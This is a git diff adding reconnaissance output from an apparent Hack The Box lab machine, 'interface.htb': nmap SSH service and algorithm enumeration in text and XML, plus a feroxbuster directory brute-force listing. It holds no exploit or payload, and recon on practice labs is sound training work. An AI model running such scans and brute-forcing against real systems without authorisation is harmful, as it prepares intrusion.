+| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGrQxMOFdtvAa9AGgwirSYniXm7NpzZbgIKhzgCOM1qwqK8QFkN6tZuQsCsRSzZ59+3l+Ycx5lTn11fbqLFqoqM=
+|   256 cc62905560a658629e6b80105c799b55 (ED25519)
+|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPtZ4bP4/4TJNGMNMmXWqt2dLijhttMoaeiJYJRJ4Kqy
+| ssh2-enum-algos: 
+|   kex_algorithms: (10)
+|       curve25519-sha256
+|       curve25519-sha256@libssh.org
+|       ecdh-sha2-nistp256
+|       ecdh-sha2-nistp384
+|       ecdh-sha2-nistp521
+|       diffie-hellman-group-exchange-sha256
+|       diffie-hellman-group16-sha512
+|       diffie-hellman-group18-sha512
+|       diffie-hellman-group14-sha256
+|       diffie-hellman-group14-sha1
+|   server_host_key_algorithms: (5)
+|       ssh-rsa
+|       rsa-sha2-512
+|       rsa-sha2-256
+|       ecdsa-sha2-nistp256
+|       ssh-ed25519
+|   encryption_algorithms: (6)
+|       chacha20-poly1305@openssh.com
+|       aes128-ctr
+|       aes192-ctr
+|       aes256-ctr
+|       aes128-gcm@openssh.com
+|       aes256-gcm@openssh.com
+|   mac_algorithms: (10)
+|       umac-64-etm@openssh.com
+|       umac-128-etm@openssh.com
+|       hmac-sha2-256-etm@openssh.com
+|       hmac-sha2-512-etm@openssh.com
+|       hmac-sha1-etm@openssh.com
+|       umac-64@openssh.com
+|       umac-128@openssh.com
+|       hmac-sha2-256
+|       hmac-sha2-512
+|       hmac-sha1
+|   compression_algorithms: (2)
+|       none
+|_      zlib@openssh.com
+|_banner: SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.7
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+Read data files from: /usr/bin/../share/nmap
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Sat Feb 11 20:04:33 2023 -- 1 IP address (1 host up) scanned in 3.25 seconds

HTB/interface/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml

@@ -0,0 +1,102 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE nmaprun>
+<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
+<!-- Nmap 7.93 scan initiated Sat Feb 11 20:04:30 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -p 22 -&#45;script=banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods -oN /home/simon/htb/interface/results/scans/tcp22/tcp_22_ssh_nmap.txt -oX /home/simon/htb/interface/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml interface.htb -->
+<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -p 22 -&#45;script=banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods -oN /home/simon/htb/interface/results/scans/tcp22/tcp_22_ssh_nmap.txt -oX /home/simon/htb/interface/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml interface.htb" start="1676142270" startstr="Sat Feb 11 20:04:30 2023" version="7.93" xmloutputversion="1.05">
+<scaninfo type="syn" protocol="tcp" numservices="1" services="22"/>
+<verbose level="2"/>
+<debugging level="0"/>
+<taskbegin task="NSE" time="1676142270"/>
+<taskend task="NSE" time="1676142270"/>
+<taskbegin task="NSE" time="1676142270"/>
+<taskend task="NSE" time="1676142270"/>
+<taskbegin task="SYN Stealth Scan" time="1676142270"/>
+<taskend task="SYN Stealth Scan" time="1676142271" extrainfo="1 total ports"/>
+<taskbegin task="Service scan" time="1676142271"/>
+<taskend task="Service scan" time="1676142271" extrainfo="1 service on 1 host"/>
+<taskbegin task="NSE" time="1676142271"/>
+<taskend task="NSE" time="1676142273"/>
+<taskbegin task="NSE" time="1676142273"/>
+<taskend task="NSE" time="1676142273"/>
+<host starttime="1676142270" endtime="1676142273"><status state="up" reason="user-set" reason_ttl="0"/>
+<address addr="10.129.146.193" addrtype="ipv4"/>
+<hostnames>
+<hostname name="interface.htb" type="user"/>
+<hostname name="interface.htb" type="PTR"/>
+</hostnames>
+<ports><port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="63"/><service name="ssh" product="OpenSSH" version="7.6p1 Ubuntu 4ubuntu0.7" extrainfo="Ubuntu Linux; protocol 2.0" ostype="Linux" method="probed" conf="10"><cpe>cpe:/a:openbsd:openssh:7.6p1</cpe><cpe>cpe:/o:linux:linux_kernel</cpe></service><script id="ssh-auth-methods" output="&#xa;  Supported authentication methods: &#xa;    publickey&#xa;    password"><table key="Supported authentication methods">
+<elem>publickey</elem>
+<elem>password</elem>
+</table>
+</script><script id="ssh-hostkey" output="&#xa;  2048 7289a0957eceaea8596b2d2dbc90b55a (RSA)&#xa;ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDsUhYQQaT6D7Isd510Mjs3HcpUf64NWRgfkCDtCcPC3KjgNKdOByzhdgpqKftmogBoGPHDlfDboK5hTEm/6mqhbNQDhOiX1Y++AXwcgLAOpjfSExhKQSyKZVveZCl/JjB/th0YA12XJXECXl5GbNFtxDW6DnueLP5l0gWzFxJdtj7C57yai6MpHieKm564NOhsAqYqcxX8O54E9xUBW4u9n2vSM6ZnMutQiNSkfanyV0Pdo+yRWBY9TpfYHvt5A3qfcNbF3tMdQ6wddCPi98g+mEBdIbn1wQOvL0POpZ4DVg0asibwRAGo1NiUX3+dJDJbThkO7TeLyROvX/kostPH&#xa;  256 01848c66d34ec4b1611f2d4d389c42c3 (ECDSA)&#xa;ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGrQxMOFdtvAa9AGgwirSYniXm7NpzZbgIKhzgCOM1qwqK8QFkN6tZuQsCsRSzZ59+3l+Ycx5lTn11fbqLFqoqM=&#xa;  256 cc62905560a658629e6b80105c799b55 (ED25519)&#xa;ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPtZ4bP4/4TJNGMNMmXWqt2dLijhttMoaeiJYJRJ4Kqy"><table>
+<elem key="type">ssh-rsa</elem>
+<elem key="key">AAAAB3NzaC1yc2EAAAADAQABAAABAQDsUhYQQaT6D7Isd510Mjs3HcpUf64NWRgfkCDtCcPC3KjgNKdOByzhdgpqKftmogBoGPHDlfDboK5hTEm/6mqhbNQDhOiX1Y++AXwcgLAOpjfSExhKQSyKZVveZCl/JjB/th0YA12XJXECXl5GbNFtxDW6DnueLP5l0gWzFxJdtj7C57yai6MpHieKm564NOhsAqYqcxX8O54E9xUBW4u9n2vSM6ZnMutQiNSkfanyV0Pdo+yRWBY9TpfYHvt5A3qfcNbF3tMdQ6wddCPi98g+mEBdIbn1wQOvL0POpZ4DVg0asibwRAGo1NiUX3+dJDJbThkO7TeLyROvX/kostPH</elem>
+<elem key="fingerprint">7289a0957eceaea8596b2d2dbc90b55a</elem>
+<elem key="bits">2048</elem>
+</table>
+<table>
+<elem key="type">ecdsa-sha2-nistp256</elem>
+<elem key="key">AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGrQxMOFdtvAa9AGgwirSYniXm7NpzZbgIKhzgCOM1qwqK8QFkN6tZuQsCsRSzZ59+3l+Ycx5lTn11fbqLFqoqM=</elem>
+<elem key="fingerprint">01848c66d34ec4b1611f2d4d389c42c3</elem>
+<elem key="bits">256</elem>
+</table>
+<table>
+<elem key="type">ssh-ed25519</elem>
+<elem key="key">AAAAC3NzaC1lZDI1NTE5AAAAIPtZ4bP4/4TJNGMNMmXWqt2dLijhttMoaeiJYJRJ4Kqy</elem>
+<elem key="fingerprint">cc62905560a658629e6b80105c799b55</elem>
+<elem key="bits">256</elem>
+</table>
+</script><script id="ssh2-enum-algos" output="&#xa;  kex_algorithms: (10)&#xa;      curve25519-sha256&#xa;      curve25519-sha256@libssh.org&#xa;      ecdh-sha2-nistp256&#xa;      ecdh-sha2-nistp384&#xa;      ecdh-sha2-nistp521&#xa;      diffie-hellman-group-exchange-sha256&#xa;      diffie-hellman-group16-sha512&#xa;      diffie-hellman-group18-sha512&#xa;      diffie-hellman-group14-sha256&#xa;      diffie-hellman-group14-sha1&#xa;  server_host_key_algorithms: (5)&#xa;      ssh-rsa&#xa;      rsa-sha2-512&#xa;      rsa-sha2-256&#xa;      ecdsa-sha2-nistp256&#xa;      ssh-ed25519&#xa;  encryption_algorithms: (6)&#xa;      chacha20-poly1305@openssh.com&#xa;      aes128-ctr&#xa;      aes192-ctr&#xa;      aes256-ctr&#xa;      aes128-gcm@openssh.com&#xa;      aes256-gcm@openssh.com&#xa;  mac_algorithms: (10)&#xa;      umac-64-etm@openssh.com&#xa;      umac-128-etm@openssh.com&#xa;      hmac-sha2-256-etm@openssh.com&#xa;      hmac-sha2-512-etm@openssh.com&#xa;      hmac-sha1-etm@openssh.com&#xa;      umac-64@openssh.com&#xa;      umac-128@openssh.com&#xa;      hmac-sha2-256&#xa;      hmac-sha2-512&#xa;      hmac-sha1&#xa;  compression_algorithms: (2)&#xa;      none&#xa;      zlib@openssh.com"><table key="kex_algorithms">
+<elem>curve25519-sha256</elem>
+<elem>curve25519-sha256@libssh.org</elem>
+<elem>ecdh-sha2-nistp256</elem>
+<elem>ecdh-sha2-nistp384</elem>
+<elem>ecdh-sha2-nistp521</elem>
+<elem>diffie-hellman-group-exchange-sha256</elem>
+<elem>diffie-hellman-group16-sha512</elem>
+<elem>diffie-hellman-group18-sha512</elem>
+<elem>diffie-hellman-group14-sha256</elem>
+<elem>diffie-hellman-group14-sha1</elem>
+</table>
+<table key="server_host_key_algorithms">
+<elem>ssh-rsa</elem>
+<elem>rsa-sha2-512</elem>
+<elem>rsa-sha2-256</elem>
+<elem>ecdsa-sha2-nistp256</elem>
+<elem>ssh-ed25519</elem>
+</table>
+<table key="encryption_algorithms">
+<elem>chacha20-poly1305@openssh.com</elem>
+<elem>aes128-ctr</elem>
+<elem>aes192-ctr</elem>
+<elem>aes256-ctr</elem>
+<elem>aes128-gcm@openssh.com</elem>
+<elem>aes256-gcm@openssh.com</elem>
+</table>
+<table key="mac_algorithms">
+<elem>umac-64-etm@openssh.com</elem>
+<elem>umac-128-etm@openssh.com</elem>
+<elem>hmac-sha2-256-etm@openssh.com</elem>
+<elem>hmac-sha2-512-etm@openssh.com</elem>
+<elem>hmac-sha1-etm@openssh.com</elem>
+<elem>umac-64@openssh.com</elem>
+<elem>umac-128@openssh.com</elem>
+<elem>hmac-sha2-256</elem>
+<elem>hmac-sha2-512</elem>
+<elem>hmac-sha1</elem>
+</table>
+<table key="compression_algorithms">
+<elem>none</elem>
+<elem>zlib@openssh.com</elem>
+</table>
+</script><script id="banner" output="SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.7"/></port>
+</ports>
+<times srtt="19555" rttvar="19555" to="100000"/>
+</host>
+<taskbegin task="NSE" time="1676142273"/>
+<taskend task="NSE" time="1676142273"/>
+<taskbegin task="NSE" time="1676142273"/>
+<taskend task="NSE" time="1676142273"/>
+<runstats><finished time="1676142273" timestr="Sat Feb 11 20:04:33 2023" summary="Nmap done at Sat Feb 11 20:04:33 2023; 1 IP address (1 host up) scanned in 3.25 seconds" elapsed="3.25" exit="success"/><hosts up="1" down="0" total="1"/>
+</runstats>
+</nmaprun>

HTB/interface/results/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt

@@ -0,0 +1,180 @@
+200      GET        1l      316w    15444c http://interface.htb/_next/static/chunks/pages/index-c95e13dd48858e5b.js
+200      GET        5l       46w    15086c http://interface.htb/favicon.ico
+200      GET        1l      111w     6359c http://interface.htb/
+200      GET        1l     1559w    86841c http://interface.htb/_next/static/chunks/main-50de763069eba4b2.js
+200      GET        1l     1821w    91460c http://interface.htb/_next/static/chunks/polyfills-c67a75d1b6f99dc8.js
+200      GET        1l        2w       77c http://interface.htb/_next/static/Z79wh4kSTt439cxBUytQN/_ssgManifest.js
+308      GET        1l        1w        0c http://interface.htb/application/ => http://interface.htb/application
+308      GET        1l        1w        0c http://interface.htb/.git/logs/ => http://interface.htb/.git/logs
+308      GET        1l        1w        0c http://interface.htb/.git/_next/static/ => http://interface.htb/.git/_next/static
+200      GET        1l        3w      245c http://interface.htb/_next/static/chunks/pages/_error-dfcfa5bb62767c20.js
+200      GET        1l       39w     1591c http://interface.htb/_next/static/chunks/webpack-ee7e63bc15b31913.js
+308      GET        1l        1w        0c http://interface.htb/.git/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/.git/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/_next/static/chunks/pages/ => http://interface.htb/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/.git/logs/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/.git/logs/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/_next/static/chunks/ => http://interface.htb/_next/static/chunks
+308      GET        1l        1w        0c http://interface.htb/.git/logs/application/ => http://interface.htb/.git/logs/application
+308      GET        1l        1w        0c http://interface.htb/_next/static/ => http://interface.htb/_next/static
+308      GET        1l        1w        0c http://interface.htb/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/.git/logs/_next/static/ => http://interface.htb/.git/logs/_next/static
+200      GET        1l        5w      279c http://interface.htb/_next/static/chunks/pages/_app-df511a3677d160f6.js
+200      GET        1l        1w      282c http://interface.htb/_next/static/Z79wh4kSTt439cxBUytQN/_buildManifest.js
+308      GET        1l        1w        0c http://interface.htb/.git/application/ => http://interface.htb/.git/application
+308      GET        1l        1w        0c http://interface.htb/.git/logs/_next/static/chunks/ => http://interface.htb/.git/logs/_next/static/chunks
+200      GET       33l     2908w   141045c http://interface.htb/_next/static/chunks/framework-8c5acb0054140387.js
+308      GET        1l        1w        0c http://interface.htb/.git/_next/ => http://interface.htb/.git/_next
+308      GET        1l        1w        0c http://interface.htb/_next/ => http://interface.htb/_next
+308      GET        1l        1w        0c http://interface.htb/.git/logs/_next/ => http://interface.htb/.git/logs/_next
+308      GET        1l        1w        0c http://interface.htb/.git/_next/static/chunks/pages/ => http://interface.htb/.git/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/.git/_next/static/chunks/ => http://interface.htb/.git/_next/static/chunks
+308      GET        1l        1w        0c http://interface.htb/.git/logs/_next/static/chunks/pages/ => http://interface.htb/.git/logs/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/.well-known/_next/static/ => http://interface.htb/.well-known/_next/static
+308      GET        1l        1w        0c http://interface.htb/.well-known/_next/static/chunks/ => http://interface.htb/.well-known/_next/static/chunks
+308      GET        1l        1w        0c http://interface.htb/.svn/_next/static/ => http://interface.htb/.svn/_next/static
+308      GET        1l        1w        0c http://interface.htb/.well-known/_next/static/chunks/pages/ => http://interface.htb/.well-known/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/.svn/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/.svn/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/.well-known/_next/ => http://interface.htb/.well-known/_next
+308      GET        1l        1w        0c http://interface.htb/.well-known/autoconfig/_next/static/chunks/pages/ => http://interface.htb/.well-known/autoconfig/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/.well-known/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/.well-known/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/.svn/application/ => http://interface.htb/.svn/application
+308      GET        1l        1w        0c http://interface.htb/.svn/_next/static/chunks/ => http://interface.htb/.svn/_next/static/chunks
+308      GET        1l        1w        0c http://interface.htb/.svn/_next/static/chunks/pages/ => http://interface.htb/.svn/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/.well-known/autoconfig/application/ => http://interface.htb/.well-known/autoconfig/application
+308      GET        1l        1w        0c http://interface.htb/.well-known/application/ => http://interface.htb/.well-known/application
+308      GET        1l        1w        0c http://interface.htb/.svn/_next/ => http://interface.htb/.svn/_next
+308      GET        1l        1w        0c http://interface.htb/.well-known/autoconfig/_next/static/chunks/ => http://interface.htb/.well-known/autoconfig/_next/static/chunks
+308      GET        1l        1w        0c http://interface.htb/.well-known/autoconfig/_next/static/ => http://interface.htb/.well-known/autoconfig/_next/static
+308      GET        1l        1w        0c http://interface.htb/.well-known/autoconfig/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/.well-known/autoconfig/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/.well-known/autoconfig/_next/ => http://interface.htb/.well-known/autoconfig/_next
+308      GET        1l        1w        0c http://interface.htb/CVS/_next/static/ => http://interface.htb/CVS/_next/static
+308      GET        1l        1w        0c http://interface.htb/CVS/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/CVS/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/CVS/_next/static/chunks/pages/ => http://interface.htb/CVS/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/CVS/_next/ => http://interface.htb/CVS/_next
+308      GET        1l        1w        0c http://interface.htb/CVS/_next/static/chunks/ => http://interface.htb/CVS/_next/static/chunks
+308      GET        1l        1w        0c http://interface.htb/CVS/application/ => http://interface.htb/CVS/application
+308      GET        1l        1w        0c http://interface.htb/_vti_bin/_vti_adm/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/_vti_bin/_vti_adm/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/_vti_bin/_vti_aut/_next/static/ => http://interface.htb/_vti_bin/_vti_aut/_next/static
+308      GET        1l        1w        0c http://interface.htb/_vti_bin/_vti_adm/_next/static/ => http://interface.htb/_vti_bin/_vti_adm/_next/static
+308      GET        1l        1w        0c http://interface.htb/_vti_bin/_vti_aut/application/ => http://interface.htb/_vti_bin/_vti_aut/application
+308      GET        1l        1w        0c http://interface.htb/_vti_bin/application/ => http://interface.htb/_vti_bin/application
+308      GET        1l        1w        0c http://interface.htb/_vti_bin/_vti_aut/_next/static/chunks/ => http://interface.htb/_vti_bin/_vti_aut/_next/static/chunks
+308      GET        1l        1w        0c http://interface.htb/_vti_bin/_next/static/chunks/pages/ => http://interface.htb/_vti_bin/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/_vti_bin/_next/static/chunks/ => http://interface.htb/_vti_bin/_next/static/chunks
+308      GET        1l        1w        0c http://interface.htb/_vti_bin/_vti_aut/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/_vti_bin/_vti_aut/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/_vti_bin/_vti_adm/_next/ => http://interface.htb/_vti_bin/_vti_adm/_next
+308      GET        1l        1w        0c http://interface.htb/_vti_bin/_next/static/ => http://interface.htb/_vti_bin/_next/static
+308      GET        1l        1w        0c http://interface.htb/_vti_bin/_vti_adm/application/ => http://interface.htb/_vti_bin/_vti_adm/application
+308      GET        1l        1w        0c http://interface.htb/_vti_bin/_vti_adm/_next/static/chunks/pages/ => http://interface.htb/_vti_bin/_vti_adm/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/_vti_bin/_next/ => http://interface.htb/_vti_bin/_next
+308      GET        1l        1w        0c http://interface.htb/_vti_bin/_vti_adm/_next/static/chunks/ => http://interface.htb/_vti_bin/_vti_adm/_next/static/chunks
+308      GET        1l        1w        0c http://interface.htb/_vti_bin/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/_vti_bin/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/_vti_bin/_vti_aut/_next/static/chunks/pages/ => http://interface.htb/_vti_bin/_vti_aut/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/_vti_bin/_vti_aut/_next/ => http://interface.htb/_vti_bin/_vti_aut/_next
+308      GET        1l        1w        0c http://interface.htb/android/_next/static/chunks/ => http://interface.htb/android/_next/static/chunks
+308      GET        1l        1w        0c http://interface.htb/android/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/android/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/android/application/ => http://interface.htb/android/application
+308      GET        1l        1w        0c http://interface.htb/android/_next/static/ => http://interface.htb/android/_next/static
+308      GET        1l        1w        0c http://interface.htb/android/_next/ => http://interface.htb/android/_next
+308      GET        1l        1w        0c http://interface.htb/android/_next/static/chunks/pages/ => http://interface.htb/android/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/api/application/ => http://interface.htb/api/application
+308      GET        1l        1w        0c http://interface.htb/api/experiments/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/api/experiments/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/api/experiments/_next/static/chunks/ => http://interface.htb/api/experiments/_next/static/chunks
+308      GET        1l        1w        0c http://interface.htb/api/_next/static/chunks/ => http://interface.htb/api/_next/static/chunks
+308      GET        1l        1w        0c http://interface.htb/api/experiments/_next/static/ => http://interface.htb/api/experiments/_next/static
+308      GET        1l        1w        0c http://interface.htb/api/experiments/_next/ => http://interface.htb/api/experiments/_next
+308      GET        1l        1w        0c http://interface.htb/api/_next/static/ => http://interface.htb/api/_next/static
+308      GET        1l        1w        0c http://interface.htb/api/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/api/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/api/_next/ => http://interface.htb/api/_next
+308      GET        1l        1w        0c http://interface.htb/api/experiments/application/ => http://interface.htb/api/experiments/application
+308      GET        1l        1w        0c http://interface.htb/api/_next/static/chunks/pages/ => http://interface.htb/api/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/api/experiments/_next/static/chunks/pages/ => http://interface.htb/api/experiments/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/cgi-bin/ => http://interface.htb/cgi-bin
+308      GET        1l        1w        0c http://interface.htb/cgi-bin/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/cgi-bin/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/cgi-bin/application/ => http://interface.htb/cgi-bin/application
+308      GET        1l        1w        0c http://interface.htb/cgi-bin/_next/static/ => http://interface.htb/cgi-bin/_next/static
+308      GET        1l        1w        0c http://interface.htb/cgi-bin/_next/static/chunks/pages/ => http://interface.htb/cgi-bin/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/cgi-bin/_next/ => http://interface.htb/cgi-bin/_next
+308      GET        1l        1w        0c http://interface.htb/cgi-bin/_next/static/chunks/ => http://interface.htb/cgi-bin/_next/static/chunks
+308      GET        1l        1w        0c http://interface.htb/federation/_next/static/chunks/ => http://interface.htb/federation/_next/static/chunks
+308      GET        1l        1w        0c http://interface.htb/federation/_next/static/chunks/pages/ => http://interface.htb/federation/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/federation/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/federation/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/federation/application/ => http://interface.htb/federation/application
+308      GET        1l        1w        0c http://interface.htb/federation/_next/static/ => http://interface.htb/federation/_next/static
+308      GET        1l        1w        0c http://interface.htb/federation/_next/ => http://interface.htb/federation/_next
+308      GET        1l        1w        0c http://interface.htb/ios/application/ => http://interface.htb/ios/application
+308      GET        1l        1w        0c http://interface.htb/ios/_next/static/chunks/pages/ => http://interface.htb/ios/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/ios/_next/ => http://interface.htb/ios/_next
+308      GET        1l        1w        0c http://interface.htb/ios/_next/static/chunks/ => http://interface.htb/ios/_next/static/chunks
+308      GET        1l        1w        0c http://interface.htb/ios/_next/static/ => http://interface.htb/ios/_next/static
+308      GET        1l        1w        0c http://interface.htb/ios/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/ios/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/mfa/_next/ => http://interface.htb/mfa/_next
+308      GET        1l        1w        0c http://interface.htb/mfa/application/ => http://interface.htb/mfa/application
+308      GET        1l        1w        0c http://interface.htb/mfa/_next/static/ => http://interface.htb/mfa/_next/static
+308      GET        1l        1w        0c http://interface.htb/mfa/_next/static/chunks/pages/ => http://interface.htb/mfa/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/mfa/_next/static/chunks/ => http://interface.htb/mfa/_next/static/chunks
+308      GET        1l        1w        0c http://interface.htb/mfa/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/mfa/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/oauth/application/ => http://interface.htb/oauth/application
+308      GET        1l        1w        0c http://interface.htb/oauth/device/_next/static/chunks/ => http://interface.htb/oauth/device/_next/static/chunks
+308      GET        1l        1w        0c http://interface.htb/oauth/device/application/ => http://interface.htb/oauth/device/application
+308      GET        1l        1w        0c http://interface.htb/oauth/device/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/oauth/device/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/oauth/token/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/oauth/token/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/oauth/_next/static/chunks/pages/ => http://interface.htb/oauth/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/oauth/device/_next/static/chunks/pages/ => http://interface.htb/oauth/device/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/oauth/token/_next/ => http://interface.htb/oauth/token/_next
+308      GET        1l        1w        0c http://interface.htb/oauth/_next/static/ => http://interface.htb/oauth/_next/static
+308      GET        1l        1w        0c http://interface.htb/oauth/device/_next/ => http://interface.htb/oauth/device/_next
+308      GET        1l        1w        0c http://interface.htb/oauth/token/_next/static/chunks/pages/ => http://interface.htb/oauth/token/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/oauth/_next/ => http://interface.htb/oauth/_next
+308      GET        1l        1w        0c http://interface.htb/oauth/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/oauth/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/oauth/token/_next/static/ => http://interface.htb/oauth/token/_next/static
+308      GET        1l        1w        0c http://interface.htb/oauth/_next/static/chunks/ => http://interface.htb/oauth/_next/static/chunks
+308      GET        1l        1w        0c http://interface.htb/oauth/token/application/ => http://interface.htb/oauth/token/application
+308      GET        1l        1w        0c http://interface.htb/oauth/device/_next/static/ => http://interface.htb/oauth/device/_next/static
+308      GET        1l        1w        0c http://interface.htb/oauth/token/_next/static/chunks/ => http://interface.htb/oauth/token/_next/static/chunks
+308      GET        1l        1w        0c http://interface.htb/oidc/_next/static/chunks/pages/ => http://interface.htb/oidc/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/oidc/_next/static/chunks/ => http://interface.htb/oidc/_next/static/chunks
+308      GET        1l        1w        0c http://interface.htb/oidc/_next/static/ => http://interface.htb/oidc/_next/static
+308      GET        1l        1w        0c http://interface.htb/oidc/application/ => http://interface.htb/oidc/application
+308      GET        1l        1w        0c http://interface.htb/oidc/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/oidc/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/oidc/_next/ => http://interface.htb/oidc/_next
+308      GET        1l        1w        0c http://interface.htb/servlet/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/servlet/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/servlet/application/ => http://interface.htb/servlet/application
+308      GET        1l        1w        0c http://interface.htb/servlet/_next/static/chunks/pages/ => http://interface.htb/servlet/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/servlet/_next/static/ => http://interface.htb/servlet/_next/static
+308      GET        1l        1w        0c http://interface.htb/servlet/_next/ => http://interface.htb/servlet/_next
+308      GET        1l        1w        0c http://interface.htb/servlet/_next/static/chunks/ => http://interface.htb/servlet/_next/static/chunks
+308      GET        1l        1w        0c http://interface.htb/token/_next/static/chunks/ => http://interface.htb/token/_next/static/chunks
+308      GET        1l        1w        0c http://interface.htb/token/_next/ => http://interface.htb/token/_next
+308      GET        1l        1w        0c http://interface.htb/token/_next/static/ => http://interface.htb/token/_next/static
+308      GET        1l        1w        0c http://interface.htb/token/_next/static/chunks/pages/ => http://interface.htb/token/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/token/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/token/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/token/application/ => http://interface.htb/token/application
+308      GET        1l        1w        0c http://interface.htb/v1/application/ => http://interface.htb/v1/application
+308      GET        1l        1w        0c http://interface.htb/v1/_next/ => http://interface.htb/v1/_next
+308      GET        1l        1w        0c http://interface.htb/v1/_next/static/chunks/ => http://interface.htb/v1/_next/static/chunks
